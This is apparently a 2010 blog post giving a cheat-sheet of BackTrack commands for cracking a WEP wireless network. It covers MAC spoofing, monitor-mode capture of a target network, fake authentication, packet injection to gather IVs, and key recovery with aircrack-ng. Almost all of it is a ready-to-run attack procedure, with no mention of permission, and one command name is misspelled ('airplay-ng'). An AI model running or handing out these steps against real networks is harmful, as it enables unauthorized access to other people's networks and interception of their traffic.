Sunday, May 02, 2010

Backtrack WEP cracking cheat-sheet

Preparation

1. Stop the wireless adapter (wlan0):

airmon-ng stop wlan0

2. Change the MAC address:

macchanger --mac 00:11:22:33:44:55 wlan0

3. Start the wireless adapter:

airmon-ng start wlan0

This will create a mon0 interface that is used from now on.

Attack

1. Identify the MAC address (BSSID), channel (CH) and name (ESSID) of the target network:

airodump-ng mon0

2. Start the packet capture:

airodump-ng -c [channel] -w /tmp/capture --bssid [bssid] mon0
 
3. Associate with the AP (in another terminal window):

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55 -e [essid] mon0

If this succeeds, you should see something like:

Sending Authentication Request (Open System) [ACK]
Authentication successful
Sending Association Request [ACK]
Association successful :-) (AID: 1)

4. Start injecting packets to speed things up (in another terminal window):

airplay-ng -3 -b [bssid] -h 00:11:22:33:44:55 mon0

Check the packet capture window, the #Data field should be increasing now. Once enough packets are captured you can proceed to cracking the key. You should run the cracking in parallel with the packet capturing, that way you can just keep gathering data if the cracking process fails and try again later. I run the cracking command every 10k IVs starting at 20k IVs.

Cracking

Attempt to crack the key:

aircrack-ng -n 128 -b [bssid] /tmp/capture-01.cap

If cracking fails, try running it after you've capture 10k more packets.